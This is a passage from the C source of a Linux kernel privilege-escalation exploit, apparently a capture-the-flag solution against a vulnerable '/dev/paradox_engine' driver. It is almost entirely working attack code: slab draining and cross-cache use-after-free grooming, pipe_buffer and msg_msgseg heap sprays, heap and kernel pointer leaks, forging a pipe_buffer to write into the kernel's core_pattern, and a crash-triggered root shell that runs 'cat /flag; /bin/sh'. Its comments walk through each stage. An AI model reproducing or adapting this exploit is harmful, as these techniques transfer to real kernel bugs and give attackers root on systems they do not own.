        }
    }
}

void *freecpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
}

int pipe_fds_2[200][2];

void *spray_pipe_buf_2() {
    pin_this_thread_to_cpu(1);
    printf("[+] Spraying pipe_buffer to reclaim victim...\n");
    
    int mult = 0x1000 / 40;
    
    for (int i = 0; i < 200; i++) {
        char* buf = malloc(0x100);
        memset(buf, 'a', 0x100);
        // TODO: Implement splicing to zero the page ptr
        int res = pipe(pipe_fds_2[i]);
        if (res < 0) printf("Failed to allocate pipe buffers\n" );
        // pipe max size is 1048576 = 0x100000 = 0x1000 * 0x100
        res = fcntl(pipe_fds_2[i][1], F_SETPIPE_SZ, 0x1000 * 64);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
        }
        // res = write(pipe_fds_2[i][1], buf, 0x100);
        // if (res < 0) {
        //     printf("[x] Write!\n");
        //     return -1;
        // }
    }
    printf("[+] Spray done\n");
}

int ms_qids[NUM_MSGMSG];
void *spray_msg_msg_seg() {
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);
    
    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000: 
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
    struct msgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };

    struct msgbuf *msg = malloc(sizeof(struct msgbuf));
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        int ret = msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0);
        if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
        }
    }
}

// https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf
// cross cache:
// objs_per_slab = 36
// cpu_partial = 120
// 0. pin to a cpu
// 1. allocate objs_per_slab * (cpu_partial + 1) objs to drain partially-free slabs [2]
// 2. allocate (objs_per_slab - 1) objects as pre-alloc objs [2]
// 3. allocate victim and UAF it [1]
// 4. allocate (objs_per_slab + 1) objects as post-alloc objects [2]
// 5. release all pre-alloc and post-alloc objects [2]
// 6. free one object per slab from step 1 (cpu_partial slabs) to trigger flushing for cpu partial list [2]
// 7. spray with msg_msg to reclaim [2]

int just_wait()
{
    sleep(1000000000);
}

void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	char path[0x100];
	// fix stdin, stdout, stderr
	sprintf(path, "/proc/%d/ns/net", pid);
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int cfd[2];
char* dummybuf = "abcd";

int main(int argc, char **argv) {
    // if it called from triggerred crash from core pattern
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
    // this code is "activated" when core_pattern has been overwritten and triggers a crash
    setvbuf(stdout, 0, 2, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}

    pin_this_thread_to_cpu(0);
    fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
    fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
    fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
    fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    // getchar();
    if (fd1 < 0 || fd2 < 0) die("open /dev/paradox_engine");
    printf("[+] devices opened\n");
    printf("[+] creating events...\n");
    // drain partially-free slabs
    
    // for (int i = 0; i < 34; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    //     if (evt < 0) printf("[x] evt!");
    // }
    // uint64_t togotocpu0[CPU_PARTIAL * 2];
    // for (int i = 0; i < CPU_PARTIAL * 2; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd1, 0, 0, "to_go_into_cpu0");
    //     if (evt < 0) printf("[x] evt!");
    //     togotocpu0[i] = evt;
    // }

    uint64_t partiallyfrees[CPU_PARTIAL + 1];
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
            partiallyfrees[i / OBJS_PER_SLAB] = evt;
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
        }
        if (evt < 0) printf("[x] evt!");
    }

    pthread_t t1;
    pthread_create(&t1, NULL, fillcpu1, NULL);
    pthread_join(t1, NULL);
    printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

    for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
        uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
        if (tl < 0) printf("[x] tl!");
    }
    
    uint64_t preallocs[OBJS_PER_SLAB - 1];
    printf("[+] Creating pre-alloc objects\n");
    for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
        // pre-alloc objects
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        preallocs[i] = evt;
    }

    printf("[+] creating self-referential event...\n");
    uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
    printf("[+] self-ref event created: e0=%llu\n", e0);
    
    printf("[+] Creating post-alloc objects\n");
    uint64_t postallocs[OBJS_PER_SLAB + 1];

    for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "post-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "post-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        postallocs[i] = evt;
    }

    close(fd5);
    // pause();
    pthread_t t2;
    pthread_create(&t2, NULL, freecpu1, NULL);
    pthread_join(t2, NULL);
    printf("[+] Freeing self-referential event...\n");
    pthread_t t;
    pthread_create(&t, NULL, freefd2, NULL);
    // sleep(5); // bro...
    // block until the other thread enters
    sleep(1);
    printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
    close(fd1);
    
    int cpu  = sched_getcpu(); 
    printf("[+] Main thread running on cpu %d\n", cpu);
    printf("[+] About to spray...\n");
    // getchar();
    printf("[+] Spraying pipe buffer...\n");
    int pipe_fds[NUM_PIPES][2];
    int ret = 0;
    int found = 0;
    size_t cursize = 0x10;
    int changed_pipe = -1;
    // getchar();
    for (int i = 0; i < (0x1000 / 0x10); i++) {
        // printf("i: %d\n", i);
        char* buf = malloc(cursize);
        memset(buf, '\x00', cursize);
        for (int j2 = 0; j2 + 8 < cursize; j2 += 0x10) {
            buf[j2 + 8] = '\x01';
        }
        // create pipes and write contents
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j: %d\n", j);
            int res = pipe(pipe_fds[j]);
            if (res < 0) printf("Failed to allocate pipe buffers\n" );
            ret = write(pipe_fds[j][1], buf, cursize);
            if (ret < 0) {
                printf("[x] Write!\n");
                return -1;
            }
        }
        // check if any pipes had content changed
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j2: %d\n", j);
            char* recvbuf = malloc(cursize);
            usleep(10); // transfer control to other thread
            ret = read(pipe_fds[j][0], recvbuf, cursize);
            if (ret < 0) {
                printf("[x] Read!\n");
                return -1;
            }
            if (memcmp(recvbuf, buf, cursize) != 0) {
                printf("We got lucky! Pipe %d had content changed!\n", j);
                changed_pipe = j;
                printf("Expected: ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)buf[k]);
                }
                printf("\nGot:      ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)recvbuf[k]);
                }
                printf("\n");
                found = 1;
                break;
            }
        }
        if (found) {
            break;
        }
        // close all pipes
        for (int j = 0; j < NUM_PIPES; j++) {
            close(pipe_fds[j][1]);
            close(pipe_fds[j][0]);
        }
        cursize += 0x10;
    }
    if (found == -1) {
        printf("Victim pipe not found!\n");
        return -1;
    }
    /* 
    now we know the object's offset in the page, i.e. 0x...??0

      Now we overwrite the refcount with 1 and partially overwrite the pointer for a
      page kfree
    */
    printf("[+] Pre-stage 1\n");
    // getchar();
    printf("[+] Stage 1: Spraying pipe_buffer to claim order 10 page...\n");
    // getchar();
    int pfds[PIPE_BUF_SPRAY1][2];
    char* filler1 = malloc(0x1000);
    memset(filler1, 'A', 0x1000);
    int res;
    // stage 1: reclaiming order 10 pages using enlarged pipe_buffer structs
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        res = pipe(pfds[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers\n" );
            return -1;
        }
        // enlarge
        // we can spray at most around 60 of these before we get cooked
        res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
            return -1;
        }
        // write into bufs[0]
        res = write(pfds[i][1], filler1, 1);
        if (res < 0) {
            printf("write failed!\n" );
            return -1;
        }
    }
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // set the first pipe_buf's op field to NULL
        // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
        read(pfds[i][0], filler1, 1);
    }
    printf("[+] Stage 1 done!\n");
    // stage 2 may crash if we were unlucky in step 1
    printf("[+] Stage 2: Using partial overwrite to free page...\n");
    // need to spray enough to push the victim pipe into free_area instead of cpu1 ?
    int dummy_pipes[DUMMY_PIPES][2];
    for (int i = 0; i < DUMMY_PIPES; i++) {
        int res = pipe(dummy_pipes[i]);
        if (res < 0) {
            printf("Failed to create pipe %d\n", i);
            break;
        }
    }
    for (int i = 0; i < DUMMY_PIPES; i++) {
        res = write(dummy_pipes[i][1], "a", 1);
        if (res < 0) {
            printf("Failed to write to pipe %d\n", i);
            break;
        }
        close(dummy_pipes[i][1]);
        close(dummy_pipes[i][0]);
    }
    close(pipe_fds[changed_pipe][1]);
    close(pipe_fds[changed_pipe][0]);
    usleep(1000);
    // getchar();
    char* buf = malloc(cursize + 3);
    memset(buf, '\x00', cursize + 3);
    buf[cursize - 0x8] = '\x01'; // refcount
    // buf[cursize + 2] = '\xa0';
    buf[cursize + 2] = '\x60';
    
    int stage_2_pipes[PIPE_BUF_SPRAY2][2];
    for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
        // printf("i: %d\n", i);
        int res = pipe(stage_2_pipes[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers %d\n", i);
            break;
        } 
        ret = write(stage_2_pipes[i][1], buf, cursize + 3);
        if (ret < 0) {
            printf("[x] Write!\n");
            break;
        }
    }
    printf("[+] Stage 2 done!\n");
    getchar();
    printf("[+] Stage 3: Spraying msg_msgseg to reclaim page in cpu 1... (if this step hangs just re-run)\n");
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
    printf("[+] Stage 3 done!\n");
    printf("[+] Stage 4: Initializing pipe_buffer to prepare for leaks...\n");
    // get vDSO addr
	size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
	struct iovec iov = {vvar, 1};
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // res = write(pfds[i][1], filler1, 1);
        // if (res < 0) {
        //     printf("write failed!\n" );
        //     return -1;
        // }
        // vmsplice trick
        SYSCHK(vmsplice(pfds[i][1], &iov, 1, 0));
    }
    printf("[+] Stage 4 done!\n");
    // getchar();
    printf("[+] Stage 5: Leaking heap addresses using msg_msgseg and pipe_buffer overlap...\n");
    int victim_msqid = -1;
    struct leakmsgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };
    struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
    leakmsg->mtype = 6;
    memset(leakmsg, 0, sizeof(struct leakmsgbuf));
    char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
    memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
    struct pipe_buffer *p;
    for (int i = 0; i < NUM_MSGMSG; i++) {
        // read msg without freeing memory
        ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
        if (ret < 0) {
            perror("msgrcv"); 
            continue;
        }
        if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
            msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
            victim_msqid = ms_qids[i];
            printf("[+] Victim found! msqid: %d\n", victim_msqid);
            // print victim data
            for (int i = 0x1000-0x30-0x8+0x28; i < 0x1000-0x30-0x8+0x40; i++) {
                printf("%02x ", leakmsg->mtext[i]);
            }
            printf("\n");
            p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
            break;
        }
    }
    /*
    no kaslr leaks : 
    - page leak: 0xffffea00000cf400
    - pipe_buf_ops leak: 0xffffffff82c6fe80

    kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
    kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
    kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

        struct pipe_buffer {
            void *page;
            unsigned int offset, len;
            void *ops;
            unsigned int flags;
            unsigned long private;
        };
    */
    if (victim_msqid == -1) {
        printf("Victim msqid not found!\n");
        return -1;
    }
    void *page_leak;
    memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
    void *pipe_buf_ops_leak;
    memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
    printf("page leak: %p\n", page_leak);
    printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);
    printf("[+] Stage 5 done!\n");
    getchar();
    printf("[+] Stage 6: Overwriting pipe_buffer->page to point to core_pattern's page...\n");
    // modify struct page that will represent of `core_pattern`'s page
    // p->page was originally pointing vdso_image_64.data.
    // gef> p (void*)vdso_image_64
    // $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
    // gef> p &core_pattern
    // $1 = (<data variable, no debug info> *) 0xffffffff83808a60
    // gef> p 0xffffffff83808a60-0xffffffff833d0000
    // $3 = 0x438a60
    // the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000
    // every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
    // so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals to 0x863000 >> 6
    // (right shift by 12 bits and left shift by 6 bits)
    p->page += (0x438000 >> 6);
    // Since p->len == 1, we need to subtract one on p->offset
    p->offset = 0xa60 - 1;
    p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
    leakmsg->mtype = 7;
    // overwrite the pipe_buffer with msg_msg_seg (with our own modified pipe_buffer content)
    int payload_msqids[0x100];
    for (int i = 0; i < 0x100; i++) {
        payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    for (int i = 0; i < 0x100; i++) {
        ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
        if (ret < 0) {
            printf("[x] msgsnd %d!\n", i);
            return -1;
        }
    }
    printf("[+] Stage 6 done!\n");
    printf("[+] Stage 7: Overwriting core_pattern by writing into pipe_buffer...\n");
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    }
    printf("[+] Stage 7 done!\n");
    // show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    // getchar();
    
    write(cfd[1], dummybuf, 1);
    while (1) {
        sleep(100);
    }

    return 0;
}   

Last updated